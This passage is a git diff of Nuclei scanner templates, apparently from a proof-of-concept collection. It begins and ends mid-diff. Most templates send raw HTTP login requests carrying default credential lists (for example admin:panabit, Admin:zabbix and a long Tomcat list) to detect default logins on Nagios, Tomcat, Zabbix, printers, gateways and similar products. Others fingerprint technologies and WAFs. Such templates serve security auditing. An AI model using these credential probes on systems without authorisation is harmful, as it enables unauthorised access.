CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: nagios,default-login - reference: https://www.nagios.org + requests: - raw: - | GET /nagios/side.php HTTP/1.1 Host: {{Hostname}} Authorization: Basic {{base64(username + ':' + password)}} + payloads: username: - nagiosadmin @@ -19,13 +28,17 @@ requests: - nagiosadmin - nagiosxi attack: pitchfork + matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - 'Current Status' - 'Reports' condition: and + +# Enhanced by mp on 2022/03/10 diff --git a/poc/default/octobercms-default-login-9193.yaml b/poc/default/octobercms-default-login-9193.yaml index c8f33662c7..a6822af271 100644 --- a/poc/default/octobercms-default-login-9193.yaml +++ b/poc/default/octobercms-default-login-9193.yaml @@ -1,12 +1,16 @@ id: octobercms-default-login info: - name: OctoberCMS Default Login + name: OctoberCMS - Default Admin Discovery author: princechaddha severity: high - description: OctoberCMS default administrator account credential. + description: OctoberCMS default admin credentials were discovered. reference: - https://github.com/octobercms/october - https://octobercms.com/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 metadata: verified: true shodan-query: http.component:"October CMS" @@ -51,3 +55,5 @@ requests: group: 1 regex: - 'meta name="csrf\-token" content="([A-Za-z0-9]+)">' + +# Enhanced by mp on 2022/07/15 diff --git a/poc/default/ofbiz-default-login-9208.yaml b/poc/default/ofbiz-default-login-9208.yaml index bf0902a7b4..ce10e4ca8d 100644 --- a/poc/default/ofbiz-default-login-9208.yaml +++ b/poc/default/ofbiz-default-login-9208.yaml @@ -2,16 +2,15 @@ id: ofbiz-default-login info: name: Apache OfBiz Default Login author: pdteam - description: Apache OfBiz default admin credentials were discovered. severity: medium - tags: ofbiz,default-login,apache + description: Apache OfBiz default admin credentials were discovered. reference: - https://cwiki.apache.org/confluence/display/OFBIZ/Apache+OFBiz+Technical+Production+Setup+Guide classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 - cve-id: cwe-id: CWE-522 + tags: ofbiz,default-login,apache requests: - raw: - | diff --git a/poc/default/panabit-default-login-9437.yaml b/poc/default/panabit-default-login-9437.yaml index 06d198deff..41b1eb6bb4 100644 --- a/poc/default/panabit-default-login-9437.yaml +++ b/poc/default/panabit-default-login-9437.yaml @@ -1,10 +1,22 @@ id: panabit-default-login + info: name: Panabit Gateway Default Login - author: pikpikcu + author: pikpikcu,ritikchaddha severity: high - reference: https://max.book118.com/html/2017/0623/117514590.shtm + description: Panabit Gateway default credentials were discovered. + reference: + - https://max.book118.com/html/2017/0623/117514590.shtm + - https://en.panabit.com/wp-content/uploads/Panabit-Intelligent-Application-Gateway-04072020.pdf + - https://topic.alibabacloud.com/a/panabit-monitoring-installation-tutorial_8_8_20054193.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N + cvss-score: 5.8 + cwe-id: CWE-522 + metadata: + fofa-query: app="Panabit-智能网关" tags: panabit,default-login + requests: - raw: - | @@ -17,28 +29,38 @@ requests: Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 ------WebKitFormBoundaryAjZMsILtbrBp8VbC - Content-Disposition: form-data; name="{{username}}" + Content-Disposition: form-data; name="username" - admin + {{username}} ------WebKitFormBoundaryAjZMsILtbrBp8VbC - Content-Disposition: form-data; name="{{password}}" + Content-Disposition: form-data; name="password" - panabit + {{password}} ------WebKitFormBoundaryAjZMsILtbrBp8VbC-- + payloads: username: - - username + - admin password: - - password + - panabit attack: pitchfork + matchers-condition: and matchers: - type: word + part: body words: - '' - 'urn:schemas-microsoft-com:vml' - part: body condition: and + + - type: word + part: header + words: + - "paonline_admin" + - type: status status: - 200 + +# Enhanced by mp on 2022/03/10 diff --git a/poc/default/panabit-default-password-9441.yaml b/poc/default/panabit-default-password-9441.yaml index f7fa2868bc..1aff766c6b 100644 --- a/poc/default/panabit-default-password-9441.yaml +++ b/poc/default/panabit-default-password-9441.yaml @@ -1,10 +1,12 @@ id: panabit-gateway-defalut-password + info: name: Panabit Default Password author: pikpikcu severity: high reference: https://max.book118.com/html/2017/0623/117514590.shtm tags: panabit,default-login + requests: - raw: - | @@ -28,6 +30,7 @@ requests: panabit ------WebKitFormBoundaryAjZMsILtbrBp8VbC-- + matchers-condition: and matchers: - type: word @@ -36,6 +39,7 @@ requests: - 'urn:schemas-microsoft-com:vml' part: body condition: and + - type: status status: - 200 diff --git a/poc/default/pentaho-default-login-9477.yaml b/poc/default/pentaho-default-login-9477.yaml index 97537c957e..e4ba5681b5 100644 --- a/poc/default/pentaho-default-login-9477.yaml +++ b/poc/default/pentaho-default-login-9477.yaml @@ -1,19 +1,20 @@ id: pentaho-default-login + info: name: Pentaho Default Login author: pussycat0x - description: Pentaho default admin credentials were discovered. severity: high - metadata: - shodan-query: pentaho - tags: pentaho,default-login + description: Pentaho default admin credentials were discovered. reference: - https://www.hitachivantara.com/en-us/pdfd/training/pentaho-lesson-1-user-console-overview.pdf classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 - cve-id: cwe-id: CWE-522 + metadata: + shodan-query: pentaho + tags: pentaho,default-login + requests: - raw: - | @@ -22,12 +23,14 @@ requests: Content-Type: application/x-www-form-urlencoded; charset=UTF-8 j_username={{user}}&j_password={{pass}} + attack: pitchfork payloads: user: - admin pass: - password + matchers-condition: and matchers: - type: word @@ -36,6 +39,7 @@ requests: - 'pentaho/Home' - 'JSESSIONID=' condition: and + - type: status status: - 302 diff --git a/poc/default/rainloop-default-login-9812.yaml b/poc/default/rainloop-default-login-9812.yaml index f5d8862f54..ad0cf18a01 100644 --- a/poc/default/rainloop-default-login-9812.yaml +++ b/poc/default/rainloop-default-login-9812.yaml @@ -1,4 +1,5 @@ id: rainloop-default-login + info: name: Rainloop WebMail Default Login author: For3stCo1d @@ -8,23 +9,28 @@ info: metadata: fofa-query: app="RAINLOOP-WebMail" tags: rainloop,webmail,default-login,foss + requests: - raw: - | # Login Portal: /?admin GET /?/AdminAppData@no-mobile-0/0/15503332983847185/ HTTP/1.1 Host: {{Hostname}} + - | POST /?/Ajax/&q[]=/0/ HTTP/2 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Login={{user}}&Password={{pass}}&Action=AdminLogin&XToken={{token}} + attack: pitchfork payloads: user: - admin + pass: - 12345 + cookie-reuse: true extractors: - type: regex @@ -33,6 +39,7 @@ requests: group: 1 regex: - 'token":"(.+?)"' + matchers-condition: and matchers: - type: word @@ -40,6 +47,7 @@ requests: - '"Action":"AdminLogin"' - '"Result":true' condition: and + - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/poc/default/rockmongo-default-login-9897.yaml b/poc/default/rockmongo-default-login-9897.yaml index d1164252a3..5e22fa91ad 100644 --- a/poc/default/rockmongo-default-login-9897.yaml +++ b/poc/default/rockmongo-default-login-9897.yaml @@ -1,17 +1,18 @@ id: rockmongo-default-login + info: name: Rockmongo Default Login author: pikpikcu severity: high description: Rockmongo default admin credentials were discovered. - tags: rockmongo,default-login reference: - https://serverfault.com/questions/331315/how-to-change-the-default-admin-username-and-admin-password-in-rockmongo classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 - cve-id: cwe-id: CWE-522 + tags: rockmongo,default-login + requests: - raw: - | @@ -21,19 +22,23 @@ requests: Referer: {{Hostname}}/index.php?action=login.index more=0&host=0&username={{username}}&password={{password}}&db=&lang=en_us&expire=3 + payloads: username: - admin password: - admin attack: pitchfork + matchers-condition: and matchers: + - type: word words: - "Location: /index.php?action=admin.index&host=0" - "Set-Cookie: ROCK_LANG=" part: header + - type: status status: - 302 diff --git a/poc/default/sequoiadb-default-login-10152.yaml b/poc/default/sequoiadb-default-login-10152.yaml index 39348896d3..bbef4dfd07 100644 --- a/poc/default/sequoiadb-default-login-10152.yaml +++ b/poc/default/sequoiadb-default-login-10152.yaml @@ -3,8 +3,15 @@ info: name: SequoiaDB Default Login author: dhiyaneshDk severity: high - description: Searches for default admin credentials for the SequoiaDB application. + description: SequoiaDB default admin credentials were discovered. tags: default-login,sequoiadb + reference: + - https://www.sequoiadb.com/en/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cve-id: + cwe-id: CWE-522 requests: - raw: - | @@ -35,3 +42,5 @@ requests: part: body words: - '{ "errno": 0 }' + +# Enhanced by mp on 2022/03/11 diff --git a/poc/default/showdoc-default-login-10221.yaml b/poc/default/showdoc-default-login-10221.yaml index 66a630d300..597a3657bb 100644 --- a/poc/default/showdoc-default-login-10221.yaml +++ b/poc/default/showdoc-default-login-10221.yaml @@ -1,4 +1,5 @@ id: showdoc-default-login + info: name: Showdoc Default Login author: pikpikcu @@ -11,6 +12,7 @@ info: cvss-score: 5.8 cwe-id: CWE-522 tags: showdoc,default-login + requests: - raw: - | @@ -19,19 +21,23 @@ requests: Content-Type: application/x-www-form-urlencoded;charset=UTF-8 username={{username}}&password={{password}}&v_code= + payloads: username: - showdoc password: - 123456 attack: pitchfork + matchers-condition: and matchers: + - type: word words: - '"username":"showdoc"' - '"user_token":' condition: and + - type: status status: - 200 diff --git a/poc/default/solarwinds-default-login-10355.yaml b/poc/default/solarwinds-default-login-10355.yaml index f2391f8c00..64d31401a7 100644 --- a/poc/default/solarwinds-default-login-10355.yaml +++ b/poc/default/solarwinds-default-login-10355.yaml @@ -1,39 +1,25 @@ id: solarwinds-default-admin info: - name: SolarWinds Orion Default Login + name: SolarWinds Orion Default Credentials author: dwisiswant0 severity: high - description: SolarWinds Orion default admin credentials were discovered. - reference: - - https://github.com/solarwinds/OrionSDK/wiki/REST - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 tags: solarwinds,default-login -# Optional: -# POST /SolarWinds/InformationService/v3/Json/Create/Orion.Pollers HTTP/1.1 -# {"PollerType":"Hello, world! from nuclei :-P", "NetObject":"N:1337", "NetObjectType":"N", "NetObjectID":1337} + # Optional: + # POST /SolarWinds/InformationService/v3/Json/Create/Orion.Pollers HTTP/1.1 + # {"PollerType":"Hello, world! from nuclei :-P", "NetObject":"N:1337", "NetObjectType":"N", "NetObjectID":1337} -requests: - - raw: - - | - GET /SolarWinds/InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS HTTP/1.1 - Host: {{Hostname}} - Authorization: Basic {{base64(username)}} - - - | - GET /InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS HTTP/1.1 - Host: {{Hostname}} - Authorization: Basic {{base64(username)}} - - payloads: - username: - - admin - attack: pitchfork + # References: + # - https://github.com/solarwinds/OrionSDK/wiki/REST +requests: + - method: GET + path: + - "{{BaseURL}}/SolarWinds/InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS" # First path is default base path + - "{{BaseURL}}/InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS" + headers: + Authorization: "Basic YWRtaW46" matchers-condition: and matchers: - type: word @@ -49,5 +35,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/03/11 diff --git a/poc/default/spectracom-default-login-10405.yaml b/poc/default/spectracom-default-login-10405.yaml index f091831f32..e471d4861a 100644 --- a/poc/default/spectracom-default-login-10405.yaml +++ b/poc/default/spectracom-default-login-10405.yaml @@ -5,13 +5,14 @@ info: author: madrobot severity: high description: Spectracom default admin credentials were discovered. + tags: spectracom,default-login reference: - https://orolia.com/manuals/NC/Content/NC_and_SS/Com/Topics/ADMIN/Passwords.htm classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 + cve-id: cwe-id: CWE-522 - tags: spectracom,default-login requests: - raw: diff --git a/poc/default/supermicro-default-login-10572.yaml b/poc/default/supermicro-default-login-10572.yaml index 96567eaaac..9f139bf91d 100644 --- a/poc/default/supermicro-default-login-10572.yaml +++ b/poc/default/supermicro-default-login-10572.yaml @@ -1,5 +1,4 @@ id: supermicro-default-login - info: name: Supermicro Ipmi - Default Admin Login author: For3stCo1d @@ -8,7 +7,6 @@ info: reference: - https://www.gearprimer.com/wiki/supermicro-ipmi-default-username-pasword/ tags: supermicro,default-login - requests: - raw: - | @@ -17,7 +15,6 @@ requests: Content-Type: application/x-www-form-urlencoded name={{user}}&pwd={{pass}} - attack: pitchfork payloads: user: @@ -26,7 +23,6 @@ requests: pass: - ADMIN - admin - stop-at-first-match: true matchers-condition: and matchers: @@ -36,7 +32,6 @@ requests: - 'self.location=' - '/cgi/url_redirect.cgi?url_name=mainmenu' condition: and - - type: status status: - 200 diff --git a/poc/default/szhe-default-login-10635.yaml b/poc/default/szhe-default-login-10635.yaml index b99b7309fe..c1be8a2077 100644 --- a/poc/default/szhe-default-login-10635.yaml +++ b/poc/default/szhe-default-login-10635.yaml @@ -3,16 +3,15 @@ id: szhe-default-login info: name: Szhe Default Login author: pikpikcu - description: Szhe default login information was discovered. severity: medium - tags: szhe,default-login + description: Szhe default login information was discovered. reference: - - https://github.com/Cl0udG0d/SZhe_Scan # vendor homepage + - https://github.com/Cl0udG0d/SZhe_Scan classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N cvss-score: 5.8 - cve-id: cwe-id: CWE-522 + tags: szhe,default-login requests: - raw: diff --git a/poc/default/telecom-gateway-default-login-10686.yaml b/poc/default/telecom-gateway-default-login-10686.yaml index 93f096ed63..73abc6eada 100644 --- a/poc/default/telecom-gateway-default-login-10686.yaml +++ b/poc/default/telecom-gateway-default-login-10686.yaml @@ -5,9 +5,11 @@ info: author: ritikchaddha severity: high description: Telecom Gateway default admin login credentials were successful. + metadata: + max-request: 1 tags: default-login,telecom,gateway -requests: +http: - raw: - | POST /manager/login.php HTTP/1.1 @@ -21,9 +23,9 @@ requests: - admin password: - admin - - redirects: true + host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word @@ -38,4 +40,4 @@ requests: status: - 200 -# Enhanced by mp on 2022/07/04 +# digest: 4a0a00473045022100a367ccbfabd23210af96b3439c4ba6cbe08f9800ae62553ccd130828136642480220114c4652ae60ed84e6ae4c520992c75d8e25f826fd02f172fcc9e416309fe566:922c64590222798bb761d5b6d8e72950 diff --git a/poc/default/tomcat-default-login-10788.yaml b/poc/default/tomcat-default-login-10788.yaml index 071367c987..5beb8f24ea 100644 --- a/poc/default/tomcat-default-login-10788.yaml +++ b/poc/default/tomcat-default-login-10788.yaml @@ -1,18 +1,21 @@ id: tomcat-default-login + info: name: ApahceTomcat Manager Default Login author: pdteam - description: Apache Tomcat Manager default login credentials were discovered. This template checks for multiple variations. severity: high + description: Apache Tomcat Manager default login credentials were discovered. This template checks for multiple variations. reference: - https://www.rapid7.com/db/vulnerabilities/apache-tomcat-default-ovwebusr-password/ tags: tomcat,apache,default-login + requests: - raw: - | GET /manager/html HTTP/1.1 Host: {{Hostname}} Authorization: Basic {{base64(username + ':' + password)}} + payloads: username: - tomcat @@ -33,6 +36,7 @@ requests: - role1 - both - admin + password: - tomcat - admin @@ -52,14 +56,21 @@ requests: - tomcat - tomcat - 123456 - attack: pitchfork # Available options: sniper, pitchfork and clusterbomb + + attack: pitchfork # Available options: sniper, pitchfork and clusterbomb + matchers-condition: and matchers: + - type: word + part: body + words: + - "Apache Tomcat" + - "Server Information" + - "Hostname" + condition: and + - type: status status: - 200 - - type: word - words: - - Apache Tomcat # Enhanced by mp on 2022/03/03 diff --git a/poc/default/ucmdb-default-login-10869.yaml b/poc/default/ucmdb-default-login-10869.yaml index 53793d5fff..7f92b3251a 100644 --- a/poc/default/ucmdb-default-login-10869.yaml +++ b/poc/default/ucmdb-default-login-10869.yaml @@ -1,14 +1,17 @@ id: ucmdb-default-login + info: name: Micro Focus Universal CMDB Default Login author: dwisiswant0 severity: high - description: Micro Focus Universal CMDB default login credentials were discovered for diagnostics/admin. Note there is potential for this to be chained together with other vulnerabilities as with CVE-2020-11853 and CVE-2020-11854. + description: Micro Focus Universal CMDB default login credentials were discovered for diagnostics/admin. Note there is potential for this to be chained together with other vulnerabilities as with CVE-2020-11853 + and CVE-2020-11854. reference: - https://packetstormsecurity.com/files/161182/Micro-Focus-UCMDB-Remote-Code-Execution.htm classification: cwe-id: CWE-798 tags: ucmdb,default-login + requests: - raw: - | @@ -16,17 +19,20 @@ requests: Host: {{Hostname}} customerID=1&isEncoded=false&userName={{username}}&password={{base64(password)}}&ldapServerName=UCMDB + attack: pitchfork payloads: username: - diagnostics password: - admin + matchers-condition: and matchers: - type: status status: - 200 + - type: word part: header words: diff --git a/poc/default/visionhub-default-login-11027.yaml b/poc/default/visionhub-default-login-11027.yaml index f7409e95bc..91e0f51048 100644 --- a/poc/default/visionhub-default-login-11027.yaml +++ b/poc/default/visionhub-default-login-11027.yaml @@ -1,29 +1,41 @@ id: visionhub-default-login + info: name: VisionHub Default Login author: Techryptic (@Tech) severity: high - description: Default Login of admin:admin on VisionHub application. + description: VisionHub application default admin credentials were accepted. + reference: + - https://www.qognify.com/products/visionhub/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: visionhub,default-login - reference: https://www.qognify.com/products/visionhub/ + requests: - raw: - | POST /VisionHubWebApi/api/Login HTTP/1.1 Host: {{Hostname}} Authorization: Basic {{base64(username + ':' + password)}} + payloads: username: - admin password: - admin attack: pitchfork + matchers-condition: and matchers: - type: word words: - "Set-Cookie: admin" part: header + - type: status status: - 200 + +# Enhanced by mp on 2022/04/06 diff --git a/poc/default/xampp-default-page-11662.yaml b/poc/default/xampp-default-page-11662.yaml index 1319d9342e..678dc93bec 100644 --- a/poc/default/xampp-default-page-11662.yaml +++ b/poc/default/xampp-default-page-11662.yaml @@ -1,5 +1,4 @@ id: xampp-default-page - info: name: XAMPP Default Page author: dhiyaneshDK @@ -7,18 +6,15 @@ info: reference: - https://www.shodan.io/search?query=http.title%3A%22XAMPP%22&page=1 tags: tech,php,xampp,apache - requests: - method: GET path: - '{{BaseURL}}/dashboard/' - matchers-condition: and matchers: - type: word words: - 'Welcome to XAMPP' - - type: status status: - 200 diff --git a/poc/default/xerox7-default-login-11680.yaml b/poc/default/xerox7-default-login-11680.yaml index 56e300388a..ae8291f1b4 100644 --- a/poc/default/xerox7-default-login-11680.yaml +++ b/poc/default/xerox7-default-login-11680.yaml @@ -1,12 +1,17 @@ id: xerox7-default-login info: - name: Xerox WorkCentre 7xxx - Default Login + name: Xerox WorkCentre 7xxx Printer Default Login author: MiroslavSotak severity: high - description: Testing default credentials admin:1111 on Xerox WorkCentre 7xxx printer. + description: Xerox WorkCentre 7xxx printer. default admin credentials admin:1111 were discovered. + reference: + - https://www.support.xerox.com/en-us/article/en/x_wc7556_en-O23530 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: xerox,default-login - reference: https://www.support.xerox.com/en-us/article/en/x_wc7556_en-O23530 requests: - raw: @@ -43,4 +48,6 @@ requests: - "invalid" - "errmsg" condition: or - negative: true \ No newline at end of file + negative: true + +# Enhanced by mp on 2022/03/13 diff --git a/poc/default/xxljob-default-login-11712.yaml b/poc/default/xxljob-default-login-11712.yaml index 9cf9eadb12..ece0cabd03 100644 --- a/poc/default/xxljob-default-login-11712.yaml +++ b/poc/default/xxljob-default-login-11712.yaml @@ -1,34 +1,19 @@ id: xxljob-default-login - info: - name: XXL-JOB Default Login + name: XXL-JOB default login author: pdteam severity: high - description: XXL-JOB default admin credentials were discovered. - reference: - - https://github.com/xuxueli/xxl-job - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 tags: default-login,xxljob - + reference: https://github.com/xuxueli/xxl-job requests: - raw: - | POST /xxl-job-admin/login HTTP/1.1 Host:{{Hostname}} + Content-Length: 30 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - userName={{username}}&password={{password}} - - payloads: - username: - - admin - password: - - 123456 - attack: pitchfork - + userName=admin&password=123456 matchers-condition: and matchers: - type: word @@ -37,16 +22,12 @@ requests: - '"msg"' - '"content"' condition: and - - type: word words: - 'application/json' - 'XXL_JOB_LOGIN_IDENTITY' part: header condition: and - - type: status status: - 200 - -# Enhanced by mp on 2022/03/14 diff --git a/poc/default/zabbix-default-credentials-11758.yaml b/poc/default/zabbix-default-credentials-11758.yaml old mode 100755 new mode 100644 index c876466114..da0f08e602 --- a/poc/default/zabbix-default-credentials-11758.yaml +++ b/poc/default/zabbix-default-credentials-11758.yaml @@ -2,8 +2,9 @@ id: zabbix-default-credentials info: name: Zabbix Default Credentials - author: pd-team + author: pdteam severity: critical + tags: zabbix,default-login requests: - method: POST diff --git a/poc/default/zabbix-default-login-11760.yaml b/poc/default/zabbix-default-login-11760.yaml index 2f38485317..f74389187e 100644 --- a/poc/default/zabbix-default-login-11760.yaml +++ b/poc/default/zabbix-default-login-11760.yaml @@ -1,4 +1,5 @@ id: zabbix-default-login + info: name: Zabbix Default Login author: pdteam @@ -11,6 +12,7 @@ info: cvss-score: 8.3 cwe-id: CWE-522 tags: zabbix,default-login + requests: - raw: - | @@ -20,18 +22,21 @@ requests: X-Requested-With: XMLHttpRequest name={{username}}&password={{password}}&autologin=1&enter=Sign+in + payloads: username: - Admin password: - zabbix attack: pitchfork + matchers-condition: and matchers: - type: word part: header words: - "zabbix.php?action=dashboard.view" + - type: status status: - 302 diff --git a/poc/detect/default-detect-generic-6838.yaml b/poc/detect/default-detect-generic-6838.yaml index 974585c135..2ff5c46a41 100644 --- a/poc/detect/default-detect-generic-6838.yaml +++ b/poc/detect/default-detect-generic-6838.yaml @@ -3,8 +3,8 @@ id: default-detect-generic info: name: Default Web Application Detection author: andydoering - description: Catch-all for detecting default installations of web applications using common phrases found in default install pages severity: info + description: Catch-all for detecting default installations of web applications using common phrases found in default install pages tags: tech requests: diff --git a/poc/detect/dell-idrac6-detect-6918.yaml b/poc/detect/dell-idrac6-detect-6918.yaml index fa7f636dfb..7467531d62 100644 --- a/poc/detect/dell-idrac6-detect-6918.yaml +++ b/poc/detect/dell-idrac6-detect-6918.yaml @@ -1,14 +1,14 @@ id: dell-idrac6-detect + info: name: Detect Dell iDRAC6 author: kophjager007 - description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers. severity: info + description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers. + tags: tech,dell requests: - method: GET - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 path: - "{{BaseURL}}/data?get=prodServerGen" @@ -26,4 +26,4 @@ requests: - type: regex part: body regex: - - '[0-9]{2}G' \ No newline at end of file + - '[0-9]{2}G' diff --git a/poc/detect/detect-dns-over-https-6969.yaml b/poc/detect/detect-dns-over-https-6969.yaml index 65d9a2bf23..3f7d9a57f7 100644 --- a/poc/detect/detect-dns-over-https-6969.yaml +++ b/poc/detect/detect-dns-over-https-6969.yaml @@ -1,31 +1,28 @@ id: detect-dns-over-https - info: name: Detect DNS over HTTPS author: geeknik + severity: info reference: - https://developers.google.com/speed/public-dns/docs/doh/ - https://developers.cloudflare.com/1.1.1.1/dns-over-https/wireformat - severity: info tags: dns,doh,misc - requests: - method: GET path: - "{{BaseURL}}/dns-query?dns=q80BAAABAAAAAAAAA3d3dwdleGFtcGxlA2NvbQAAAQAB" headers: Accept: application/dns-message - matchers-condition: and matchers: - type: status status: - 200 - type: word + part: header words: - "application/dns-message" - part: header - type: regex + part: header regex: - "(C|c)ontent-(L|l)ength: 49" - part: header diff --git a/poc/detect/detect-jabber-xmpp-6975.yaml b/poc/detect/detect-jabber-xmpp-6975.yaml index 0f6e392149..fd3850ad2d 100644 --- a/poc/detect/detect-jabber-xmpp-6975.yaml +++ b/poc/detect/detect-jabber-xmpp-6975.yaml @@ -4,8 +4,7 @@ info: author: geeknik severity: info description: Jabber is the original name of the Extensible Messaging and Presence Protocol (XMPP), the open technology for instant messaging and presence. - reference: - - https://datatracker.ietf.org/doc/html/rfc6120 + reference: https://datatracker.ietf.org/doc/html/rfc6120 tags: network,jabber,xmpp,messaging network: - inputs: diff --git a/poc/detect/detect-rsyncd-6980.yaml b/poc/detect/detect-rsyncd-6980.yaml index 5dd5a819c5..ae708e9acc 100644 --- a/poc/detect/detect-rsyncd-6980.yaml +++ b/poc/detect/detect-rsyncd-6980.yaml @@ -2,9 +2,10 @@ id: detect-rsyncd info: name: Detect rsyncd - reference: https://linux.die.net/man/1/rsync author: vsh00t,geeknik severity: info + reference: + - https://linux.die.net/man/1/rsync tags: network,rsyncd network: diff --git a/poc/detect/dns-waf-detect-7052.yaml b/poc/detect/dns-waf-detect-7052.yaml index 2c7870a1f1..bdd9b4b38d 100644 --- a/poc/detect/dns-waf-detect-7052.yaml +++ b/poc/detect/dns-waf-detect-7052.yaml @@ -1,73 +1,54 @@ id: dns-waf-detect - info: name: DNS WAF Detection author: lu4nx severity: info tags: tech,waf,dns - dns: - name: "{{FQDN}}" type: CNAME - recursion: true - retries: 5 - class: inet - - name: "{{FQDN}}" type: NS - recursion: true - retries: 5 - class: inet - matchers: - type: word name: sanfor-shield words: - ".sangfordns.com" - - type: word name: 360panyun words: - ".360panyun.com" - - type: word name: baiduyun words: - ".yunjiasu-cdn.net" - - type: word name: chuangyudun words: - ".365cyd.cn" - ".cyudun.net" - - type: word name: knownsec words: - ".jiashule.com" - ".jiasule.org" - - type: word name: huaweicloud words: - ".huaweicloudwaf.com" - - type: word name: xinliuyun words: - ".ngaagslb.cn" - - type: word name: chinacache words: - ".chinacache.net" - ".ccgslb.net" - - type: word name: nscloudwaf words: - ".nscloudwaf.com" - - type: word name: wangsu words: @@ -84,28 +65,23 @@ dns: - ".wsssec.com" - ".wscloudcdn.com" - ".mwcloudcdn.com" - - type: word name: qianxin words: - ".360safedns.com" - ".360cloudwaf.com" - - type: word name: baiduyunjiasu words: - ".yunjiasu-cdn.net" - - type: word name: anquanbao words: - ".anquanbao.net" - - type: regex name: aliyun regex: - '\.w\.kunlun\w{2,3}\.com' - - type: regex name: aliyun-waf regex: @@ -113,59 +89,48 @@ dns: - '\.aliyunwaf\.com' - '\.aligaofang\.com' - '\.aliyundunwaf\.com' - - type: word name: xuanwudun words: - ".saaswaf.com" - ".dbappwaf.cn" - - type: word name: yundun words: - ".hwwsdns.cn" - ".yunduncname.com" - - type: word name: knownsec-ns words: - ".jiasule.net" - - type: word name: chuangyudun words: - ".365cyd.net" - - type: word name: qianxin words: - ".360wzb.com" - - type: word name: anquanbao words: - ".anquanbao.com" - - type: word name: wangsu words: - ".chinanetcenter.com" - - type: word name: baiduyunjiasue words: - ".ns.yunjiasu.com" - - type: word name: chinacache words: - ".chinacache.com" - - type: word name: cloudflare words: - "ns.cloudflare.com" - - type: word name: edns words: diff --git a/poc/detect/electron-version-detect-7198.yaml b/poc/detect/electron-version-detect-7198.yaml index 26392dc930..7aa887bf13 100644 --- a/poc/detect/electron-version-detect-7198.yaml +++ b/poc/detect/electron-version-detect-7198.yaml @@ -1,16 +1,14 @@ id: electron-version-detect - info: name: Electron Version Detect author: me9187 severity: info + reference: + - https://www.electronjs.org/blog/chromium-rce-vulnerability/ tags: electron,file - reference: https://www.electronjs.org/blog/chromium-rce-vulnerability/ - file: - extensions: - json - extractors: - type: regex regex: diff --git a/poc/detect/epson-web-control-detect-7241.yaml b/poc/detect/epson-web-control-detect-7241.yaml index 42a41d65df..bcd2634d8d 100644 --- a/poc/detect/epson-web-control-detect-7241.yaml +++ b/poc/detect/epson-web-control-detect-7241.yaml @@ -1,4 +1,5 @@ id: epson-web-control-detect + info: name: Epson Printer author: pussycat0x @@ -9,10 +10,12 @@ info: classification: cwe-id: CWE-200 tags: iot,printer,panel,unauth,epson + requests: - method: GET path: - "{{BaseURL}}/cgi-bin/home" + matchers-condition: and matchers: - type: word @@ -21,6 +24,7 @@ requests: - "Basic Control" - "Advanced" condition: and + - type: status status: - 200 diff --git a/poc/detect/expn-mail-detect-7279.yaml b/poc/detect/expn-mail-detect-7279.yaml index f7e32264f9..729fe47f7a 100644 --- a/poc/detect/expn-mail-detect-7279.yaml +++ b/poc/detect/expn-mail-detect-7279.yaml @@ -4,8 +4,6 @@ info: name: EXPN Mail Server Detect author: r3dg33k severity: info - description: | - The "EXPN" can be used by attackers to learn about valid usernames on the target system. On some SMTP servers, EXPN can be used to show the subscribers of a mailing list subscription lists are generally considered to be sensitive information. tags: mail,expn,network network: @@ -21,4 +19,4 @@ network: matchers: - type: word words: - - "250-EXPN" + - "250-EXPN" \ No newline at end of file diff --git 